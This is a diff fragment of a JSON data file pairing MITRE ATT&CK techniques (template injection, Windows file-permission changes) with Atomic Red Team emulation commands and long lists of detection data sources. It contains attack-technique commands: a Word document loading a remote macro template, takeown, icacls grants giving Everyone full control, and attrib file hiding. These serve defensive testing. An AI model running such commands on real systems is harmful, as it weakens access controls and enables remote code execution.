"T1221", + "display_name": "Template Injection", + "atomic_tests": [ + { + "name": "WINWORD Remote Template Injection", + "auto_generated_guid": "1489e08a-82c7-44ee-b769-51b72d03521d", + "description": "Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm \nExecutes the code specified within the .dotm template.\nRequires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. 
\nDefault docs file opens Calculator.exe when test sucessfully executed, while AV turned off.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "docx_file": { + "description": "Location of the test docx file on the local filesystem.", + "type": "Path", + "default": "PathToAtomicsFolder\\T1221\\src\\Calculator.docx" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "", + "prereq_command": "", + "get_prereq_command": "" + } + ], + "executor": { + "command": "start #{docx_file}\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network 
traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-darkhydrus-uses-phishery-harvest-credentials-middle-east/", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null + ] + }, + { + "technique_id": "T1222.001", + "command_list": [ + "takeown.exe /f %temp%\\T1222.001_takeown_folder /r\n", + "icacls.exe %temp%\\T1222.001_cacls /grant #{user_or_group}:F\n", + "icacls.exe #{file_or_folder} /grant Everyone:F\n", + "attrib.exe -r %temp%\\T1222.001_attrib\\*.* /s\n", + "mkdir %temp%\\T1222.001_attrib_2 >nul 2>&1\necho T1222.001_attrib1 >> %temp%\\T1222.001_attrib_2\\T1222.001_attrib1.txt\necho T1222.001_attrib2 >> %temp%\\T1222.001_attrib_2\\T1222.001_attrib2.txt\nattrib.exe +h %temp%\\T1222.001_attrib_2\\T1222.001_attrib1.txt\nattrib.exe +h %temp%\\T1222.001_attrib_2\\T1222.001_attrib2.txt\n", + "icacls \"C:\\Users\\Public\\*\" /grant Everyone:F /T /C /Q", + "icacls \"#{path}\" /grant Everyone:F /T /C /Q" + ], + "commands": [ + { + "command": "takeown.exe /f 
%temp%\\T1222.001_takeown_folder /r\n", + "source": "atomics/T1222.001/T1222.001.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Windows File and Directory Permissions Modification" + }, + { + "command": "icacls.exe %temp%\\T1222.001_cacls /grant #{user_or_group}:F\n", + "source": "atomics/T1222.001/T1222.001.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Windows File and Directory Permissions Modification" + }, + { + "command": "icacls.exe #{file_or_folder} /grant Everyone:F\n", + "source": "atomics/T1222.001/T1222.001.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Windows File and Directory Permissions Modification" + }, + { + "command": "attrib.exe -r %temp%\\T1222.001_attrib\\*.* /s\n", + "source": "atomics/T1222.001/T1222.001.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Windows File and Directory Permissions Modification" + }, + { + "command": "mkdir %temp%\\T1222.001_attrib_2 >nul 2>&1\necho T1222.001_attrib1 >> %temp%\\T1222.001_attrib_2\\T1222.001_attrib1.txt\necho T1222.001_attrib2 >> %temp%\\T1222.001_attrib_2\\T1222.001_attrib2.txt\nattrib.exe +h %temp%\\T1222.001_attrib_2\\T1222.001_attrib1.txt\nattrib.exe +h %temp%\\T1222.001_attrib_2\\T1222.001_attrib2.txt\n", + "source": "atomics/T1222.001/T1222.001.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Windows File and Directory Permissions Modification" + }, + { + "command": "icacls \"C:\\Users\\Public\\*\" /grant Everyone:F /T /C /Q", + "source": "atomics/T1222.001/T1222.001.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Windows File and Directory Permissions Modification" + }, + { + "command": "icacls \"#{path}\" /grant Everyone:F /T /C /Q", + "source": "atomics/T1222.001/T1222.001.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Windows 
File and Directory Permissions Modification" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1222.001", + "display_name": "File and Directory Permissions Modification: Windows File and Directory Permissions Modification", + "atomic_tests": [ + { + "name": "Take ownership using takeown utility", + "auto_generated_guid": "98d34bb4-6e75-42ad-9c41-1dae7dc6a001", + "description": "Modifies the filesystem permissions of the specified file or folder to take ownership of the object. Upon execution, \"SUCCESS\" will\nbe displayed for the folder and each file inside of it.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_folder_to_own": { + "description": "Path of the file or folder for takeown to take ownership.", + "type": "Path", + "default": "%temp%\\T1222.001_takeown_folder" + } + }, + "dependency_executor_name": "command_prompt", + "dependencies": [ + { + "description": "Test requrires a file to take ownership of to be located at (#{file_folder_to_own})\n", + "prereq_command": "IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 )\n", + "get_prereq_command": "mkdir #{file_folder_to_own}\necho T1222.001_takeown1 >> #{file_folder_to_own}\\T1222.001_takeown1.txt\necho T1222.001_takeown2 >> #{file_folder_to_own}\\T1222.001_takeown2.txt\n" + } + ], + "executor": { + "command": "takeown.exe /f #{file_folder_to_own} /r\n", + "name": "command_prompt" + } + }, + { + "name": "cacls - Grant permission to specified user or group recursively", + "auto_generated_guid": "a8206bcc-f282-40a9-a389-05d9c0263485", + "description": "Modifies the filesystem permissions of the specified folder and contents to allow the specified user or group Full Control. If \"Access is denied\"\nis displayed it may be because the file or folder doesn't exit. Run the prereq command to create it. 
Upon successfull execution, \"Successfully processed 3 files\"\nwill be displayed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_or_folder": { + "description": "Path of the file or folder to change permissions.", + "type": "Path", + "default": "%temp%\\T1222.001_cacls" + }, + "user_or_group": { + "description": "User or group to allow full control", + "type": "String", + "default": "Everyone" + } + }, + "dependency_executor_name": "command_prompt", + "dependencies": [ + { + "description": "Test requrires a file to modify to be located at (#{file_or_folder})\n", + "prereq_command": "IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )\n", + "get_prereq_command": "mkdir #{file_or_folder}\necho T1222.001_cacls1 >> #{file_or_folder}\\T1222.001_cacls1.txt\necho T1222.001_cacls2 >> #{file_or_folder}\\T1222.001_cacls2.txt\n" + } + ], + "executor": { + "command": "icacls.exe #{file_or_folder} /grant #{user_or_group}:F\n", + "name": "command_prompt" + } + }, + { + "name": "attrib - Remove read-only attribute", + "auto_generated_guid": "bec1e95c-83aa-492e-ab77-60c71bbd21b0", + "description": "Removes the read-only attribute from a file or folder using the attrib.exe command. 
Upon execution, no output will be displayed.\nOpen the file in File Explorer > Right Click - Prperties and observe that the Read Only checkbox is empty.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_or_folder": { + "description": "Path of the file or folder remove attribute.", + "type": "Path", + "default": "%temp%\\T1222.001_attrib" + } + }, + "dependency_executor_name": "command_prompt", + "dependencies": [ + { + "description": "Test requrires a file to modify to be located at (#{file_or_folder})\n", + "prereq_command": "IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )\n", + "get_prereq_command": "mkdir #{file_or_folder}\necho T1222.001_attrib1 >> #{file_or_folder}\\T1222.001_attrib1.txt\necho T1222.001_attrib2 >> #{file_or_folder}\\T1222.001_attrib2.txt\nattrib.exe +r #{file_or_folder}\\T1222.001_attrib1.txt\nattrib.exe +r #{file_or_folder}\\T1222.001_attrib2.txt\n" + } + ], + "executor": { + "command": "attrib.exe -r #{file_or_folder}\\*.* /s\n", + "name": "command_prompt" + } + }, + { + "name": "attrib - hide file", + "auto_generated_guid": "32b979da-7b68-42c9-9a99-0e39900fc36c", + "description": "Attackers leverage an existing Windows binary, attrib.exe, to mark specific files or folder as hidden by using specific flags so that\nthe victim does not see the file.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + 